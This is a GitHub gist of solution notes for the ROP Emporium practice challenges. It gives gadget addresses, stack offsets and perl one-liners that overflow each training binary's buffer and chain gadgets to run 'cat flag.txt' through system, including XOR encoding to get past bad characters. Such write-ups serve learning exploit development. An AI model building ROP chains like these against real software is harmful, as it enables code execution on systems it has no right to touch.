Skip to content

Instantly share code, notes, and snippets.

@stek29

stek29/0_ropemporium.md

Last active January 4, 2018 20:59
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save stek29/3965fc8172c80a7e3dff4426e21d1c08 to your computer and use it in GitHub Desktop.
Save stek29/3965fc8172c80a7e3dff4426e21d1c08 to your computer and use it in GitHub Desktop.
Download ZIP
ropemporium
Raw
0_ropemporium.md

ROP Emporium

import struct
def dumpx(x): return (''.join(map(lambda x: '\\x%02x'%x, struct.pack('<Q', x))))
def d(x): print ('print "%s";' % dumpx(x))
Raw
badchars.txt
gadget-1:
0000000000400b34 movq %r12, (%r13)
0000000000400b38 ret
gadget 0:
0000000000400b3b popq %r12
0000000000400b3d popq %r13
0000000000400b3f ret
gadget 1:
0000000000400bb0 popq %r14
0000000000400bb2 popq %r15
0000000000400bb4 ret
gadget 2:
usefulGadgets:
0000000000400b30 xorb %r14b, (%r15)
0000000000400b33 ret
gadget 3: (mid-instruction)
0000000000400bb3 popq %rdi
0000000000400bb4 ret
gadget 4:
00000000004009e8 call j_system
data section starts at 0x601050 and size is 0x10
❯ objdump -h write4 | grep \\.data
24 .data 00000010 0000000000601070 0000000000601070 00001050 2**3
cat *xt\0 = \x63\x61\x74\x20\x2a\x78\x74\x00
0x63 and 0x20 are badchars
so we'd xor at STR and STR+3
however, if we place STR at 0x601070, then we'd need to xor at 0x601073
but 0x601073 is prohibited
so we'd place STR at 0x601071
perl -e '
print "x"x40;
print "\x3b\x0b\x40\0\0\0\0\0\x64\x61\x74\x27\x2a\x78\x74\x00\x71\x10\x60\0\0\0\0\0";
print "\x34\x0b\x40\0\0\0\0\0";
print "\xb0\x0b\x40\0\0\0\0\0\x07\x00\x00\x00\x00\x00\x00\x00\x71\x10\x60\0\0\0\0\0";
print "\x30\x0b\x40\0\0\0\0\0";
print "\xb0\x0b\x40\0\0\0\0\0\x07\x00\x00\x00\x00\x00\x00\x00\x74\x10\x60\0\0\0\0\0";
print "\x30\x0b\x40\0\0\0\0\0";
print "\xb3\x0b\x40\0\0\0\0\0\x71\x10\x60\0\0\0\0\0";
print "\xe8\x09\x40\0\0\0\0\0";
print "\n";
' | ./badchars
pwned :)
Raw
callme.txt
0x20 (32) local vars
0x08 ( 8) rbp
---
0x08 ( 8) ret addr
0x100 (256) is read, so there is 0xd8 (216) bytes of overwrite
exactly what we need kek:
usefulGadgets:
0000000000401ab0 popq %rdi
0000000000401ab1 popq %rsi
0000000000401ab2 popq %rdx
0000000000401ab3 ret
0x28 (40) of garbage
0x20 0x401ab0, 0x1, 0x2, 0x3
0x08 0x401850
0x20 0x401ab0, 0x1, 0x2, 0x3
0x08 0x401870
0x20 0x401ab0, 0x1, 0x2, 0x3
0x08 0x401810
so, 0x28 * 3 of payload -- 0x78 (120) bytes
perl -e '
print "x"x40;
print "\xb0\x1a\x40\0\0\0\0\0\x01\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x03\0\0\0\0\0\0\0";
print "\x50\x18\x40\0\0\0\0\0";
print "\xb0\x1a\x40\0\0\0\0\0\x01\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x03\0\0\0\0\0\0\0";
print "\x70\x18\x40\0\0\0\0\0";
print "\xb0\x1a\x40\0\0\0\0\0\x01\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x03\0\0\0\0\0\0\0";
print "\x10\x18\x40\0\0\0\0\0";
' | ./callme
Raw
fluff.txt
j_system: // system
00000000004005e0 jmpq *system@GOT
----
00000000004008c3 popq %rdi
00000000004008c4 ret
----
questionableGadgets:
0000000000400820 popq %r15
0000000000400822 xorq %r11, %r11
0000000000400825 popq %r14
0000000000400827 movl __data_start, %edi
000000000040082c ret
000000000040082d popq %r14
000000000040082f xorq %r12, %r11
0000000000400832 popq %r12
0000000000400834 movl $0x604060, %r13d
000000000040083a ret
000000000040083b movl __data_start, %edi
0000000000400840 xchgq %r10, %r11
0000000000400843 popq %r15
0000000000400845 movl system@@GLIBC_2.2.5, %r11d
000000000040084b ret
000000000040084c popq %r15
000000000040084e movq %r11, (%r10)
0000000000400851 popq %r13
0000000000400853 popq %r12
0000000000400855 xorb %r12b, (%r10)
0000000000400858 ret
---
0000000000400845 * movl $0x602050, %r11d
000000000040084b x ret
---
0000000000400832 x * popq %r12
0000000000400834 movl $0x604060, %r13d
000000000040083a x ret
---
000000000040082f * xorq %r12, %r11
0000000000400832 x * popq %r12
0000000000400834 movl $0x604060, %r13d
000000000040083a x ret
---
0000000000400840 * xchgq %r10, %r11
0000000000400843 x popq %r15
0000000000400845 * movl $0x602050, %r11d
000000000040084b x ret
---
000000000040082f * xorq %r12, %r11
0000000000400832 x * popq %r12
0000000000400834 movl $0x604060, %r13d
000000000040083a x ret
---
000000000040084e * movq %r11, (%r10)
0000000000400851 x popq %r13
0000000000400853 x * popq %r12
0000000000400855 * xorb %r12b, (%r10)
0000000000400858 x ret
---
00000000004008c3 x * popq %rdi
00000000004008c4 x ret
---
00000000004005e0 jmpq *system@GOT
---
24 .data 00000010 0000000000601050 0000000000601050 00001050 2**3
CONTENTS, ALLOC, LOAD, DATA
cat *xt\0 = \x63\x61\x74\x20\x2a\x78\x74\x00
0x74782a20746163 ^ 0x602050 = 0x74782a20144133
\x33\x41\x14\x20\x2a\x78\x74\x00
0x601050
0x601050 ^ 0x602050 = 0x3000
\x00\x00\x00\x00\x00\x00\x30\x00
perl -e '
print "x"x40; # filling
print "\x45\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x0000000000400845
print "\x32\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x0000000000400832
print "\x00\x30\x00\x00\x00\x00\x00\x00"; # 0x601050 ^ 0x602050, to pop into r12
print "\x2f\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x000000000040082f
print "\x33\x41\x14\x20\x2a\x78\x74\x00"; # 0x74782a20746163 ^ 0x602050, to pop into r12
print "\x40\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x0000000000400840
print "\xde\xad\xfa\xce\xca\xfe\xba\xbe"; # garbage for r15
print "\x2f\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x000000000040082f
print "\xde\xad\xfa\xce\xca\xfe\xba\xbe"; # garbage for r12
print "\x4e\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x000000000040084e
print "\xde\xad\xfa\xce\xca\xfe\xba\xbe"; # garbage for r13
print "\x00\x00\x00\x00\x00\x00\x00\x00"; # zeros for r12, to xor with *(%r10)
print "\xc3\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x00000000004008c3
print "\x50\x10\x60\x00\x00\x00\x00\x00"; # 0x601050, to pop into rdi
print "\xe0\x05\x40\x00\x00\x00\x00\x00"; # ret to 0x00000000004005e0
' | ./fluff
Raw
split.txt
0x20 (32) local vars
0x08 ( 8) rbp
---
0x08 ( 8) ret addr
0x60 (96) is read, so there is 0x38 (56) bytes of overwrite
'popq %r15' is
datgadget:
0000000000400883 popq %rdi
0000000000400884 ret
at 0x601060: "/bin/cat flag.txt"
perl -e '
print "x"x40; # filler
print "\x83\x08\x40\0\0\0\0\0"; # ret to datgadget
print "\x60\x10\x60\0\0\0\0\0"; # addr of string to pop into rdi
print "\x10\x08\x40\0\0\0\0\0"; # ret to call system
' | ./split
Raw
write4.txt
gadget 1:
0000000000400890 popq %r14
0000000000400892 popq %r15
0000000000400894 ret
gadget 2:
usefulGadgets:
0000000000400820 movq %r15, (%r14)
0000000000400823 ret
gadget 3: (mid-instruction)
0000000000400893 popq %rdi
0000000000400894 ret
gadget 4:
0000000000400810 call j_system
data section starts at 0x601050 and size is 0x10
❯ objdump -h write4 | grep \\.data
24 .data 00000010 0000000000601050 0000000000601050 00001050 2**3
cat flag = \x63\x61\x74\x20\x66\x6c\x61\x67
.txt\0 = \x2e\x74\x78\x74\x00\x00\x00\x00
perl -e '
print "x"x40;
print "\x90\x08\x40\0\0\0\0\0\x50\x10\x60\0\0\0\0\0\x63\x61\x74\x20\x66\x6c\x61\x67";
print "\x20\x08\x40\0\0\0\0\0";
print "\x90\x08\x40\0\0\0\0\0\x58\x10\x60\0\0\0\0\0\x2e\x74\x78\x74\x00\x00\x00\x00";
print "\x20\x08\x40\0\0\0\0\0";
print "\x93\x08\x40\0\0\0\0\0\x50\x10\x60\0\0\0\0\0";
print "\x10\x08\x40\0\0\0\0\0";
' | ./write4
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment